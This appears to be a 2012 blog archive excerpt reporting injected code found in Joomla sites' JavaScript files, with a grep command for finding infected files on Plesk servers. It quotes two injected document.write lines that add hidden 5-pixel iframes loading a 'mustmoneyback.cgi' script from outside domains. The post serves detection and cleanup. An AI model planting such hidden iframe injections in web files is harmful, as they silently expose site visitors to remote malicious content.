Archive for November, 2012

New joomla infections (?) mustmoneyback.cgi

Today looking at some systems I notice a new pattern on some .js files. Multiple files were infected with the following code:
;document.write(‘<iframe src=”hxxp://hfxgr.sellClassics.com/mustmoneyback.cgi?3″ align=”center” height=”5″ width=”5″></iframe>’);
;document.write(‘<iframe src=”hxxp://lenslifcs.mynumber.org/mustmoneyback.cgi?3″ align=”center” height=”5″ width=”5″></iframe>’);
and other domains were found also with the same .cgi file calls. An easy way to look for infections on PLESK systems is the following:
find /var/www/vhosts/ -type f -name ‘*.js’ -print0 | xargs -0 egrep -iw “(km0ae9gr6m|mustmoneyback)”
After locating the infections one can clean up the files …

Continue Reading →
0